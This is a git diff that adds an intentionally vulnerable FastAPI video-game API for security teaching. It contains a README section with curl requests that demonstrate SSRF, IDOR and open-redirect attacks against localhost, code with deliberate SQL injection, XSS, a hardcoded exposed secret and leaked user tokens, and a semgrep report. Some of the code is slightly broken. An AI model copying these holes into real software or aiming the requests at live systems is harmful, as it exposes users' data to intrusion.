admintoken" \ +-d "game_id=1" +``` +--- +XSS + +``` +curl -X POST "http://127.0.0.1:8000/feedback" \ + -d "feedback=" +``` +--- +IDOR +``` +curl -X GET "http://127.0.0.1:8000/user_profile?user_id=1" +``` +CSRF +``` +curl -X GET "http://127.0.0.1:8000/fetch_url?url=http://localhost:8000/.env" +``` +--- +Redirects +``` +curl -X GET "http://127.0.0.1:8000/redirect?next=http://malicious-site.com" +``` +--- +Error +``` +curl -X GET "http://127.0.0.1:8000/games/error" +``` +--- + +## **Disclaimer** + +**This API is intentionally insecure and should NOT be used in production environments. It is designed solely for educational purposes to demonstrate common security vulnerabilities. Use this API responsibly and ethically.** + +--- + +## **Important Notes** + +* **Educational Use Only:** This project is intended to help developers learn about API security vulnerabilities in a controlled environment. +* **Do Not Deploy Publicly:** Running this API on a public server can expose you and others to security risks. +* **Legal and Ethical Responsibility:** Ensure you comply with all applicable laws and ethical guidelines when using or modifying this code. + +--- + +**Thank you for using this educational API to enhance your understanding of API security\!** diff --git a/insecure-api/database.py b/insecure-api/database.py new file mode 100644 index 0000000..8677c46 --- /dev/null +++ b/insecure-api/database.py @@ -0,0 +1,161 @@ +from models import VideoGame, User + +# Simulated database +video_games = [ + VideoGame(id=1, title="The Legend of Zelda: Breath of the Wild", developer="Nintendo EPD", publisher="Nintendo", year_published=2017, sales=25_000_000), + VideoGame(id=2, title="Super Mario Odyssey", developer="Nintendo EPD", publisher="Nintendo", year_published=2017, sales=21_000_000), + VideoGame(id=3, title="Red Dead Redemption 2", developer="Rockstar Studios", publisher="Rockstar Games", year_published=2018, sales=50_000_000), + VideoGame(id=4, title="God of War", developer="Santa Monica Studio", publisher="Sony Interactive Entertainment", year_published=2018, sales=19_500_000), + VideoGame(id=5, title="Marvel's Spider-Man", developer="Insomniac Games", publisher="Sony Interactive Entertainment", year_published=2018, sales=20_000_000), + VideoGame(id=6, title="Grand Theft Auto V", developer="Rockstar North", publisher="Rockstar Games", year_published=2013, sales=150_000_000), + VideoGame(id=7, title="Minecraft", developer="Mojang Studios", publisher="Xbox Game Studios", year_published=2011, sales=238_000_000), + VideoGame(id=8, title="Fortnite", developer="Epic Games", publisher="Epic Games", year_published=2017, sales=0), # Free-to-play + VideoGame(id=9, title="Call of Duty: Modern Warfare", developer="Infinity Ward", publisher="Activision", year_published=2019, sales=30_000_000), + VideoGame(id=10, title="Apex Legends", developer="Respawn Entertainment", publisher="Electronic Arts", year_published=2019, sales=0), # Free-to-play + VideoGame(id=11, title="Animal Crossing: New Horizons", developer="Nintendo EPD", publisher="Nintendo", year_published=2020, sales=33_890_000), + VideoGame(id=12, title="Cyberpunk 2077", developer="CD Projekt Red", publisher="CD Projekt", year_published=2020, sales=13_700_000), + VideoGame(id=13, title="Halo Infinite", developer="343 Industries", publisher="Xbox Game Studios", year_published=2021, sales=1_000_000), + VideoGame(id=14, title="Doom Eternal", developer="id Software", publisher="Bethesda Softworks", year_published=2020, sales=3_000_000), + VideoGame(id=15, title="The Last of Us Part II", developer="Naughty Dog", publisher="Sony Interactive Entertainment", year_published=2020, sales=10_000_000), + VideoGame(id=16, title="FIFA 21", developer="EA Vancouver", publisher="Electronic Arts", year_published=2020, sales=20_000_000), + VideoGame(id=17, title="NBA 2K21", developer="Visual Concepts", publisher="2K Sports", year_published=2020, sales=8_000_000), + VideoGame(id=18, title="Assassin's Creed Valhalla", developer="Ubisoft Montreal", publisher="Ubisoft", year_published=2020, sales=12_000_000), + VideoGame(id=19, title="Ghost of Tsushima", developer="Sucker Punch Productions", publisher="Sony Interactive Entertainment", year_published=2020, sales=6_500_000), + VideoGame(id=20, title="Hades", developer="Supergiant Games", publisher="Supergiant Games", year_published=2020, sales=1_000_000), + VideoGame(id=21, title="Resident Evil Village", developer="Capcom", publisher="Capcom", year_published=2021, sales=5_000_000), + VideoGame(id=22, title="Monster Hunter: World", developer="Capcom", publisher="Capcom", year_published=2018, sales=17_000_000), + VideoGame(id=23, title="Super Smash Bros. Ultimate", developer="Bandai Namco Studios/Sora Ltd.", publisher="Nintendo", year_published=2018, sales=25_710_000), + VideoGame(id=24, title="Mario Kart 8 Deluxe", developer="Nintendo EPD", publisher="Nintendo", year_published=2017, sales=38_740_000), + VideoGame(id=25, title="Pokémon Sword and Shield", developer="Game Freak", publisher="Nintendo", year_published=2019, sales=22_640_000), + VideoGame(id=26, title="Fall Guys", developer="Mediatonic", publisher="Devolver Digital", year_published=2020, sales=11_000_000), + VideoGame(id=27, title="Among Us", developer="InnerSloth", publisher="InnerSloth", year_published=2018, sales=3_000_000), + VideoGame(id=28, title="Death Stranding", developer="Kojima Productions", publisher="Sony Interactive Entertainment", year_published=2019, sales=5_000_000), + VideoGame(id=29, title="Sekiro: Shadows Die Twice", developer="FromSoftware", publisher="Activision", year_published=2019, sales=5_000_000), + VideoGame(id=30, title="Control", developer="Remedy Entertainment", publisher="505 Games", year_published=2019, sales=2_000_000), + VideoGame(id=31, title="Horizon Zero Dawn", developer="Guerrilla Games", publisher="Sony Interactive Entertainment", year_published=2017, sales=10_000_000), + VideoGame(id=32, title="Cuphead", developer="Studio MDHR", publisher="Studio MDHR", year_published=2017, sales=6_000_000), + VideoGame(id=33, title="The Witcher 3: Wild Hunt", developer="CD Projekt Red", publisher="CD Projekt", year_published=2015, sales=30_000_000), + VideoGame(id=34, title="Overwatch", developer="Blizzard Entertainment", publisher="Blizzard Entertainment", year_published=2016, sales=50_000_000), + VideoGame(id=35, title="Dark Souls III", developer="FromSoftware", publisher="Bandai Namco Entertainment", year_published=2016, sales=10_000_000), + VideoGame(id=36, title="Bloodborne", developer="FromSoftware", publisher="Sony Interactive Entertainment", year_published=2015, sales=2_000_000), + VideoGame(id=37, title="Rocket League", developer="Psyonix", publisher="Psyonix", year_published=2015, sales=10_500_000), + VideoGame(id=38, title="Destiny 2", developer="Bungie", publisher="Bungie", year_published=2017, sales=1_000_000), + VideoGame(id=39, title="Battlefield V", developer="EA DICE", publisher="Electronic Arts", year_published=2018, sales=7_300_000), + VideoGame(id=40, title="Far Cry 5", developer="Ubisoft Montreal", publisher="Ubisoft", year_published=2018, sales=5_000_000), + VideoGame(id=41, title="The Elder Scrolls V: Skyrim", developer="Bethesda Game Studios", publisher="Bethesda Softworks", year_published=2011, sales=30_000_000), + VideoGame(id=42, title="Metal Gear Solid V: The Phantom Pain", developer="Kojima Productions", publisher="Konami", year_published=2015, sales=6_000_000), + VideoGame(id=43, title="No Man's Sky", developer="Hello Games", publisher="Hello Games", year_published=2016, sales=2_000_000), + VideoGame(id=44, title="Stardew Valley", developer="ConcernedApe", publisher="ConcernedApe", year_published=2016, sales=15_000_000), + VideoGame(id=45, title="Persona 5", developer="Atlus", publisher="Atlus", year_published=2016, sales=3_200_000), + VideoGame(id=46, title="Resident Evil 2", developer="Capcom", publisher="Capcom", year_published=2019, sales=10_000_000), + VideoGame(id=47, title="Resident Evil 3", developer="Capcom", publisher="Capcom", year_published=2020, sales=4_000_000), + VideoGame(id=48, title="Borderlands 3", developer="Gearbox Software", publisher="2K Games", year_published=2019, sales=14_000_000), + VideoGame(id=49, title="Final Fantasy VII Remake", developer="Square Enix Business Division 1", publisher="Square Enix", year_published=2020, sales=5_000_000), + VideoGame(id=50, title="The Outer Worlds", developer="Obsidian Entertainment", publisher="Private Division", year_published=2019, sales=3_000_000), + VideoGame(id=51, title="Ori and the Will of the Wisps", developer="Moon Studios", publisher="Xbox Game Studios", year_published=2020, sales=2_000_000), + VideoGame(id=52, title="Genshin Impact", developer="miHoYo", publisher="miHoYo", year_published=2020, sales=0), # Free-to-play + VideoGame(id=53, title="Valorant", developer="Riot Games", publisher="Riot Games", year_published=2020, sales=0), # Free-to-play + VideoGame(id=54, title="Call of Duty: Warzone", developer="Infinity Ward/Raven Software", publisher="Activision", year_published=2020, sales=0), # Free-to-play + VideoGame(id=55, title="PUBG: Battlegrounds", developer="PUBG Studios", publisher="Krafton", year_published=2017, sales=70_000_000), + VideoGame(id=56, title="Nier: Automata", developer="PlatinumGames", publisher="Square Enix", year_published=2017, sales=6_000_000), + VideoGame(id=57, title="Dead Cells", developer="Motion Twin", publisher="Motion Twin", year_published=2018, sales=5_000_000), + VideoGame(id=58, title="Hollow Knight", developer="Team Cherry", publisher="Team Cherry", year_published=2017, sales=3_000_000), + VideoGame(id=59, title="Celeste", developer="Maddy Makes Games", publisher="Matt Makes Games", year_published=2018, sales=1_000_000), + VideoGame(id=60, title="Dishonored 2", developer="Arkane Studios", publisher="Bethesda Softworks", year_published=2016, sales=2_500_000), + VideoGame(id=61, title="Fire Emblem: Three Houses", developer="Intelligent Systems/Koei Tecmo", publisher="Nintendo", year_published=2019, sales=3_000_000), + VideoGame(id=62, title="Crash Bandicoot N. Sane Trilogy", developer="Vicarious Visions", publisher="Activision", year_published=2017, sales=10_000_000), + VideoGame(id=63, title="Spyro Reignited Trilogy", developer="Toys for Bob", publisher="Activision", year_published=2018, sales=2_000_000), + VideoGame(id=64, title="Subnautica", developer="1_000_000 Worlds Entertainment", publisher="1_000_000 Worlds Entertainment", year_published=2018, sales=5_000_000), + VideoGame(id=65, title="Terraria", developer="Re-Logic", publisher="Re-Logic", year_published=2011, sales=35_000_000), + VideoGame(id=66, title="League of Legends", developer="Riot Games", publisher="Riot Games", year_published=2009, sales=0), # Free-to-play + VideoGame(id=67, title="World of Warcraft", developer="Blizzard Entertainment", publisher="Blizzard Entertainment", year_published=2004, sales=14_000_000), + VideoGame(id=68, title="Dota 2", developer="Valve", publisher="Valve", year_published=2013, sales=0), # Free-to-play + VideoGame(id=69, title="Team Fortress 2", developer="Valve", publisher="Valve", year_published=2007, sales=0), # Free-to-play + VideoGame(id=70, title="Portal 2", developer="Valve", publisher="Valve", year_published=2011, sales=4_000_000), + VideoGame(id=71, title="Half-Life: Alyx", developer="Valve", publisher="Valve", year_published=2020, sales=2_000_000), + VideoGame(id=72, title="Among Us", developer="InnerSloth", publisher="InnerSloth", year_published=2018, sales=3_000_000), + VideoGame(id=73, title="Warframe", developer="Digital Extremes", publisher="Digital Extremes", year_published=2013, sales=0), # Free-to-play + VideoGame(id=74, title="Path of Exile", developer="Grinding Gear Games", publisher="Grinding Gear Games", year_published=2013, sales=0), # Free-to-play + VideoGame(id=75, title="Final Fantasy XIV", developer="Square Enix", publisher="Square Enix", year_published=2013, sales=24_000_000), + VideoGame(id=76, title="Tetris Effect", developer="Monstars Inc./Resonair", publisher="Enhance Games", year_published=2018, sales=1_000_000), + VideoGame(id=77, title="Deathloop", developer="Arkane Studios", publisher="Bethesda Softworks", year_published=2021, sales=1_000_000), + VideoGame(id=78, title="Forza Horizon 4", developer="Playground Games", publisher="Xbox Game Studios", year_published=2018, sales=10_000_000), + VideoGame(id=79, title="Gran Turismo Sport", developer="Polyphony Digital", publisher="Sony Interactive Entertainment", year_published=2017, sales=8_000_000), + VideoGame(id=80, title="Need for Speed Heat", developer="Ghost Games", publisher="Electronic Arts", year_published=2019, sales=3_000_000), + VideoGame(id=81, title="Control", developer="Remedy Entertainment", publisher="505 Games", year_published=2019, sales=2_000_000), + VideoGame(id=82, title="It Takes Two", developer="Hazelight Studios", publisher="Electronic Arts", year_published=2021, sales=3_000_000), + VideoGame(id=83, title="Ratchet & Clank: Rift Apart", developer="Insomniac Games", publisher="Sony Interactive Entertainment", year_published=2021, sales=1_100_000), + VideoGame(id=84, title="Kena: Bridge of Spirits", developer="Ember Lab", publisher="Ember Lab", year_published=2021, sales=1_000_000), + VideoGame(id=85, title="Psychonauts 2", developer="Double Fine", publisher="Xbox Game Studios", year_published=2021, sales=1_000_000), + VideoGame(id=86, title="Returnal", developer="Housemarque", publisher="Sony Interactive Entertainment", year_published=2021, sales=560_000), + VideoGame(id=87, title="Mario Party Superstars", developer="NDcube", publisher="Nintendo", year_published=2021, sales=5_430_000), + VideoGame(id=88, title="Metroid Dread", developer="MercurySteam/Nintendo EPD", publisher="Nintendo", year_published=2021, sales=2_900_000), + VideoGame(id=89, title="Back 4 Blood", developer="Turtle Rock Studios", publisher="Warner Bros. Interactive Entertainment", year_published=2021, sales=1_000_000), + VideoGame(id=90, title="Ghostrunner", developer="One More Level", publisher="505 Games", year_published=2020, sales=600_000), + VideoGame(id=91, title="Sifu", developer="Sloclap", publisher="Sloclap", year_published=2022, sales=500_000), + VideoGame(id=92, title="Elden Ring", developer="FromSoftware", publisher="Bandai Namco Entertainment", year_published=2022, sales=13_400_000), + VideoGame(id=93, title="Tiny Tina's Wonderlands", developer="Gearbox Software", publisher="2K Games", year_published=2022, sales=1_000_000), + VideoGame(id=94, title="Horizon Forbidden West", developer="Guerrilla Games", publisher="Sony Interactive Entertainment", year_published=2022, sales=8_400_000), + VideoGame(id=95, title="Gran Turismo 7", developer="Polyphony Digital", publisher="Sony Interactive Entertainment", year_published=2022, sales=1_000_000), + VideoGame(id=96, title="Kirby and the Forgotten Land", developer="HAL Laboratory", publisher="Nintendo", year_published=2022, sales=4_530_000), + VideoGame(id=97, title="LEGO Star Wars: The Skywalker Saga", developer="Traveller's Tales", publisher="Warner Bros. Interactive Entertainment", year_published=2022, sales=3_200_000), + VideoGame(id=98, title="Stray", developer="BlueTwelve Studio", publisher="Annapurna Interactive", year_published=2022, sales=1_000_000), + VideoGame(id=99, title="God of War Ragnarök", developer="Santa Monica Studio", publisher="Sony Interactive Entertainment", year_published=2022, sales=11_000_000), + VideoGame(id=100, title="Call of Duty: Vanguard", developer="Sledgehammer Games", publisher="Activision", year_published=2021, sales=5_700_000), + VideoGame(id=101, title="Halo Infinite", developer="343 Industries", publisher="Xbox Game Studios", year_published=2021, sales=1_000_000), + VideoGame(id=102, title="Resident Evil 4 Remake", developer="Capcom", publisher="Capcom", year_published=2023, sales=4_000_000), + VideoGame(id=103, title="Dead Space Remake", developer="Motive Studio", publisher="Electronic Arts", year_published=2023, sales=1_000_000), + VideoGame(id=104, title="Forspoken", developer="Luminous Productions", publisher="Square Enix", year_published=2023, sales=1_000_000), + VideoGame(id=105, title="Hogwarts Legacy", developer="Avalanche Software", publisher="Warner Bros. Interactive Entertainment", year_published=2023, sales=12_000_000), + VideoGame(id=106, title="The Legend of Zelda: Tears of the Kingdom", developer="Nintendo EPD", publisher="Nintendo", year_published=2023, sales=10_000_000), + VideoGame(id=107, title="Starfield", developer="Bethesda Game Studios", publisher="Bethesda Softworks", year_published=2023, sales=1_000_000), + VideoGame(id=108, title="Diablo IV", developer="Blizzard Entertainment", publisher="Blizzard Entertainment", year_published=2023, sales=10_000_000), + VideoGame(id=109, title="Final Fantasy XVI", developer="Square Enix Creative Business Unit III", publisher="Square Enix", year_published=2023, sales=3_000_000), + VideoGame(id=110, title="Baldur's Gate III", developer="Larian Studios", publisher="Larian Studios", year_published=2023, sales=5_200_000), + VideoGame(id=111, title="Armored Core VI: Fires of Rubicon", developer="FromSoftware", publisher="Bandai Namco Entertainment", year_published=2023, sales=1_000_000), + VideoGame(id=112, title="Marvel's Spider-Man 2", developer="Insomniac Games", publisher="Sony Interactive Entertainment", year_published=2023, sales=1_000_000), + VideoGame(id=113, title="Assassin's Creed Mirage", developer="Ubisoft Bordeaux", publisher="Ubisoft", year_published=2023, sales=1_000_000), + VideoGame(id=114, title="Forza Motorsport", developer="Turn 10 Studios", publisher="Xbox Game Studios", year_published=2023, sales=1_000_000), + VideoGame(id=115, title="Alan Wake II", developer="Remedy Entertainment", publisher="Epic Games Publishing", year_published=2023, sales=1_000_000), + VideoGame(id=116, title="Sonic Frontiers", developer="Sonic Team", publisher="Sega", year_published=2022, sales=3_200_000), + VideoGame(id=117, title="The Callisto Protocol", developer="Striking Distance Studios", publisher="Krafton", year_published=2022, sales=2_000_000), + VideoGame(id=118, title="Mario + Rabbids Sparks of Hope", developer="Ubisoft Milan/Ubisoft Paris", publisher="Ubisoft", year_published=2022, sales=1_000_000), + VideoGame(id=119, title="Splatoon 3", developer="Nintendo EPD", publisher="Nintendo", year_published=2022, sales=10_130_000), + VideoGame(id=120, title="Bayonetta 3", developer="PlatinumGames", publisher="Nintendo", year_published=2022, sales=1_000_000), + VideoGame(id=121, title="Dying Light 2 Stay Human", developer="Techland", publisher="Techland", year_published=2022, sales=5_000_000), + VideoGame(id=122, title="Saints Row", developer="Volition", publisher="Deep Silver", year_published=2022, sales=1_000_000), + VideoGame(id=123, title="Pokemon Legends: Arceus", developer="Game Freak", publisher="Nintendo", year_published=2022, sales=14_630_000), + VideoGame(id=124, title="Pokemon Scarlet and Violet", developer="Game Freak", publisher="Nintendo", year_published=2022, sales=20_610_000), + VideoGame(id=125, title="Triangle Strategy", developer="Artdink", publisher="Square Enix", year_published=2022, sales=1_000_000), + VideoGame(id=126, title="Xenoblade Chronicles 3", developer="Monolith Soft", publisher="Nintendo", year_published=2022, sales=1_810_000), + VideoGame(id=127, title="Mario Strikers: Battle League", developer="Next Level Games", publisher="Nintendo", year_published=2022, sales=2_170_000), + VideoGame(id=128, title="Fire Emblem Engage", developer="Intelligent Systems", publisher="Nintendo", year_published=2023, sales=1_610_000), + VideoGame(id=129, title="Octopath Traveler II", developer="Square Enix/Acquire", publisher="Square Enix", year_published=2023, sales=1_000_000), + VideoGame(id=130, title="Dead Island 2", developer="Dambuster Studios", publisher="Deep Silver", year_published=2023, sales=2_000_000), + VideoGame(id=131, title="Minecraft Dungeons", developer="Mojang Studios/Double Eleven", publisher="Xbox Game Studios", year_published=2020, sales=11_500_000), + VideoGame(id=132, title="Remnant II", developer="Gunfire Games", publisher="Gearbox Publishing", year_published=2023, sales=1_000_000), + VideoGame(id=133, title="Street Fighter 6", developer="Capcom", publisher="Capcom", year_published=2023, sales=2_000_000), + VideoGame(id=134, title="Pikmin 4", developer="Nintendo EPD", publisher="Nintendo", year_published=2023, sales=1_000_000), + VideoGame(id=135, title="Armored Core VI", developer="FromSoftware", publisher="Bandai Namco Entertainment", year_published=2023, sales=1_000_000), + VideoGame(id=136, title="Mortal Kombat 1", developer="NetherRealm Studios", publisher="Warner Bros. Interactive Entertainment", year_published=2023, sales=1_000_000), + VideoGame(id=137, title="S.T.A.L.K.E.R. 2: Heart of Chornobyl", developer="GSC Game World", publisher="GSC Game World", year_published=2023, sales=1_000_000), + VideoGame(id=138, title="Payday 3", developer="Overkill Software", publisher="Starbreeze Studios", year_published=2023, sales=1_000_000), + VideoGame(id=139, title="Suicide Squad: Kill the Justice League", developer="Rocksteady Studios", publisher="Warner Bros. Interactive Entertainment", year_published=2023, sales=1_000_000), + VideoGame(id=140, title="Atomic Heart", developer="Mundfish", publisher="Focus Entertainment", year_published=2023, sales=1_000_000), + VideoGame(id=141, title="The Lord of the Rings: Gollum", developer="Daedalic Entertainment", publisher="Daedalic Entertainment", year_published=2023, sales=1_000_000), + VideoGame(id=142, title="Diablo II: Resurrected", developer="Vicarious Visions", publisher="Blizzard Entertainment", year_published=2021, sales=5_000_000), + VideoGame(id=143, title="Death's Door", developer="Acid Nerve", publisher="Devolver Digital", year_published=2021, sales=1_000_000), + VideoGame(id=144, title="Disco Elysium", developer="ZA/UM", publisher="ZA/UM", year_published=2019, sales=2_000_000), + VideoGame(id=145, title="Outer Wilds", developer="Mobius Digital", publisher="Annapurna Interactive", year_published=2019, sales=1_000_000), + VideoGame(id=146, title="Hellblade: Senua's Sacrifice", developer="Ninja Theory", publisher="Ninja Theory", year_published=2017, sales=1_000_000), + VideoGame(id=147, title="Sea of Thieves", developer="Rare", publisher="Xbox Game Studios", year_published=2018, sales=5_000_000), + VideoGame(id=148, title="Ghostwire: Tokyo", developer="Tango Gameworks", publisher="Bethesda Softworks", year_published=2022, sales=1_000_000), + VideoGame(id=149, title="Evil West", developer="Flying Wild Hog", publisher="Focus Entertainment", year_published=2022, sales=1_000_000), + VideoGame(id=150, title="Return to Monkey Island", developer="Terrible Toybox", publisher="Devolver Digital", year_published=2022, sales=1_000_000), +] + +users = [ + User(username="user1", token="user1token", is_admin=False, email="user1@example.com"), + User(username="admin", token="admintoken", is_admin=True, email="admin@example.com"), +] + diff --git a/insecure-api/main.py b/insecure-api/main.py new file mode 100644 index 0000000..9b73df5 --- /dev/null +++ b/insecure-api/main.py @@ -0,0 +1,216 @@ +from fastapi import FastAPI, HTTPException, Header, Request +from typing import Optional +from models import VideoGame, User +from database import video_games, users +import sqlite3 +import os +import requests +from fastapi.responses import RedirectResponse +from contextlib import asynccontextmanager + +@asynccontextmanager +async def lifespan(app: FastAPI): + # Initialize the SQLite database + if not os.path.exists('videogames.db'): + conn = sqlite3.connect('videogames.db') + cursor = conn.cursor() + # Create table + cursor.execute(''' + CREATE TABLE video_games ( + id INTEGER PRIMARY KEY, + title TEXT NOT NULL, + developer TEXT NOT NULL, + publisher TEXT NOT NULL, + year_published INTEGER NOT NULL, + sales INTEGER NOT NULL + ) + ''') + # Insert data + for game in video_games: + cursor.execute(''' + INSERT INTO video_games (id, title, developer, publisher, year_published, sales) + VALUES (?, ?, ?, ?, ?, ?) + ''', (game.id, game.title, game.developer, game.publisher, game.year_published, game.sales)) + conn.commit() + conn.close() + yield + +app = FastAPI( + title="Intentionally Insecure Video Game API", + description="An API designed for security education, demonstrating common vulnerabilities.", + version="1.0.0", + contact={ + "name": "Your Name", + "email": "your.email@example.com", + }, + root_path="/api", + docs_url="/", + redoc_url="/redoc", + lifespan=lifespan +) + +# Public endpoint to get basic video game info +@app.get("/games") +def get_games(): + return video_games + +# Vulnerable endpoint: No authentication required to get sensitive sales data +@app.get("/games/{game_id}/sales") +def get_game_sales(game_id: int): + # Vulnerability: No authentication or authorization checks (API1:2019 - Broken Object Level Authorization) + for game in video_games: + if game.id == game_id: + return {"title": game.title, "sales": game.sales} + raise HTTPException(status_code=404, detail="Game not found") + +# Vulnerable endpoint: Weak authentication and improper authorization +@app.post("/games") +def add_game(game: VideoGame, Authorization: Optional[str] = Header(None)): + # Vulnerability: Token sent in Authorization header without proper validation (API2:2019 - Broken Authentication) + if not Authorization: + raise HTTPException(status_code=401, detail="Authorization header required") + + # Extract Bearer token + if not Authorization.startswith("Bearer "): + raise HTTPException(status_code=401, detail="Invalid Authorization header format") + token = Authorization.split(" ")[1] + + # Vulnerability: Insecure token handling and authorization (API5:2019 - Broken Function Level Authorization) + for user in users: + if user.token == token: + if user.is_admin: + video_games.append(game) + return {"message": "Game added"} + else: + raise HTTPException(status_code=403, detail="Not authorized") + raise HTTPException(status_code=401, detail="Invalid token") + +# Vulnerable endpoint: Exposes sensitive user data +@app.get("/users") +def get_users(): + # Vulnerability: Exposes tokens and admin status (API3:2019 - Excessive Data Exposure) + return users + +# Additional vulnerable endpoint: No rate limiting implemented +@app.post("/login") +def login(username: str): + # Vulnerability: No rate limiting allows brute-force attacks (API4:2019 - Lack of Resources & Rate Limiting) + for user in users: + if user.username == username: + return {"token": user.token} + raise HTTPException(status_code=404, detail="User not found") + +# Additional vulnerable endpoint: Mass assignment +@app.put("/games/{game_id}") +def update_game(game_id: int, updated_game: VideoGame): + # Vulnerability: Mass assignment allows overwriting of unintended fields (API6:2019 - Mass Assignment) + for i, game in enumerate(video_games): + if game.id == game_id: + video_games[i] = updated_game + return {"message": "Game updated"} + raise HTTPException(status_code=404, detail="Game not found") + +# Additional vulnerable endpoint: SQL Injection +@app.get("/search") +def search_games(query: str): + # Vulnerability: User input is not sanitized (API8:2019 - Injection) + conn = sqlite3.connect('videogames.db') + cursor = conn.cursor() + try: + sql_query = f"SELECT * FROM video_games WHERE title = '{query}'" + cursor.execute(sql_query) + rows = cursor.fetchall() + except Exception as e: + # Return the exception message for educational purposes (not recommended in production) + return {"error": str(e)} + finally: + conn.close() + # Convert rows to list of dictionaries + results = [] + for row in rows: + results.append({ + "id": row[0], + "title": row[1], + "developer": row[2], + "publisher": row[3], + "year_published": row[4], + "sales": row[5], + }) + return results + +# Additional vulnerable endpoint: Improper assets management +@app.get("/env") +def get_env(): + # Vulnerability: Sensitive files are exposed (API9:2019 - Improper Assets Management) + return {"SECRET_KEY": "supersecretkey"} + +# Additional vulnerable endpoint: Insufficient logging and monitoring +@app.post("/admin/delete_game") +def delete_game(game_id: int, Authorization: Optional[str] = Header(None)): + # Vulnerability: Actions are not logged (API10:2019 - Insufficient Logging & Monitoring) + if not Authorization: + raise HTTPException(status_code=401, detail="Authorization header required") + + # Extract Bearer token + if not Authorization.startswith("Bearer "): + raise HTTPException(status_code=401, detail="Invalid Authorization header format") + token = Authorization.split(" ")[1] + + for user in users: + if user.token == token and user.is_admin: + for i, game in enumerate(video_games): + if game.id == game_id: + deleted_game = video_games.pop(i) + # No logging of the deletion action + return {"message": f"Game '{deleted_game.title}' deleted"} + raise HTTPException(status_code=404, detail="Game not found") + raise HTTPException(status_code=403, detail="Not authorized") + +@app.post("/feedback") +def submit_feedback(feedback: str): + # Vulnerability: User input is not sanitized before rendering (API7:2019 - Security Misconfiguration) + response = HTMLResponse(content=f"

Feedback Received

{feedback}

") + return response + +# Additional vulnerable endpoint: Insecure Direct Object References (IDOR) +@app.get("/user_profile") +def get_user_profile(user_id: int): + # Vulnerability: No authorization checks (API1:2019 - Broken Object Level Authorization) + for user in users: + if user.username == f"user{user_id}": + return user + raise HTTPException(status_code=404, detail="User not found") + +# Additional vulnerable endpoint: Cross-Site Request Forgery (CSRF) +@app.post("/update_profile") +def update_profile(username: str, email: str, Authorization: Optional[str] = Header(None)): + # Vulnerability: No CSRF protection (API5:2019 - Broken Function Level Authorization) + if not Authorization: + raise HTTPException(status_code=401, detail="Authorization header required") + # Extract Bearer token + if not Authorization.startswith("Bearer "): + raise HTTPException(status_code=401, detail="Invalid Authorization header format") + token = Authorization.split(" ")[1] + # Simulate updating user profile + for user in users: + if user.token == token: + user.username = username + user.email = email # Assuming 'email' field exists in User model + return {"message": "Profile updated"} + raise HTTPException(status_code=401, detail="Invalid token") + +# Additional vulnerable endpoint: Server-Side Request Forgery (SSRF) +@app.get("/fetch_url") +def fetch_url_content(url: str): + # Vulnerability: No validation of the URL (API10:2019 - Unsafe Consumption of APIs) + try: + response = requests.get(url) + return {"content": response.text} + except Exception as e: + return {"error": str(e)} + +# Additional vulnerable endpoint: Unvalidated Redirects and Forwards +@app.get("/redirect") +def unsafe_redirect(next: str): + # Vulnerability: Unvalidated redirect (API10:2019 - Unsafe Consumption of APIs) + return RedirectResponse(url=next) diff --git a/insecure-api/models.py b/insecure-api/models.py new file mode 100644 index 0000000..20c4697 --- /dev/null +++ b/insecure-api/models.py @@ -0,0 +1,15 @@ +from pydantic import BaseModel + +class VideoGame(BaseModel): + id: int + title: str + developer: str + publisher: str + year_published: int + sales: int + +class User(BaseModel): + username: str + token: str + is_admin: bool + email: str diff --git a/insecure-api/requirements.txt b/insecure-api/requirements.txt new file mode 100644 index 0000000..35dd5ec --- /dev/null +++ b/insecure-api/requirements.txt @@ -0,0 +1,3 @@ +fastapi==0.115.5 +requests==2.32.3 +uvicorn==0.32.1 \ No newline at end of file diff --git a/insecure-api/semgrep.sarif b/insecure-api/semgrep.sarif new file mode 100644 index 0000000..82cfd00 --- /dev/null +++ b/insecure-api/semgrep.sarif @@ -0,0 +1 @@ +{"version":"2.1.0","runs":[{"invocations":[{"executionSuccessful":true,"toolExecutionNotifications":[]}],"results":[{"fingerprints":{"matchBasedId/v1":"6b058c8946e1bfc70e6ccfcca192217f17fcc70cef2c5a3a38563a96b90b45b051fbbf4f63fcee5175abb244ef61cf4eef69998f348a67b7c357841778aeb21b_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"Dockerfile","uriBaseId":"%SRCROOT%"},"region":{"endColumn":67,"endLine":21,"snippet":{"text":"CMD [\"uvicorn\", \"main:app\", \"--host\", \"0.0.0.0\", \"--port\", \"8000\"]"},"startColumn":1,"startLine":21}}}],"message":{"text":"By not specifying a USER, a program in the container may run as 'root'. This is a security hazard. If an attacker can control a process running as root, they may have control over the container. Ensure that the last USER in a Dockerfile is a USER other than 'root'."},"properties":{},"ruleId":"dockerfile.security.missing-user.missing-user"},{"fingerprints":{"matchBasedId/v1":"76ae1efdbaacc83ecec45511f655e0b9bff825e3f88ed2211b312fe3f08c05110c9de014a50b45b7d5f92d448e7b86ee9371ac3824c51c19f7e2dda74fb02510_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"main.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":34,"endLine":119,"snippet":{"text":" cursor.execute(sql_query)"},"startColumn":9,"startLine":119}}}],"message":{"text":"Detected possible formatted SQL query. Use parameterized queries instead."},"properties":{},"ruleId":"python.lang.security.audit.formatted-sql-query.formatted-sql-query"},{"fingerprints":{"matchBasedId/v1":"b82d2315515f3d751acd644a12d807f36e0ff9b6005c651a2fecfd003886c9e5d942c523df87b240a06011bf557bf7a951c3a9a49f9fd946b2c4bfc1c63a8b97_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"main.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":34,"endLine":119,"snippet":{"text":" cursor.execute(sql_query)"},"startColumn":9,"startLine":119}}}],"message":{"text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better 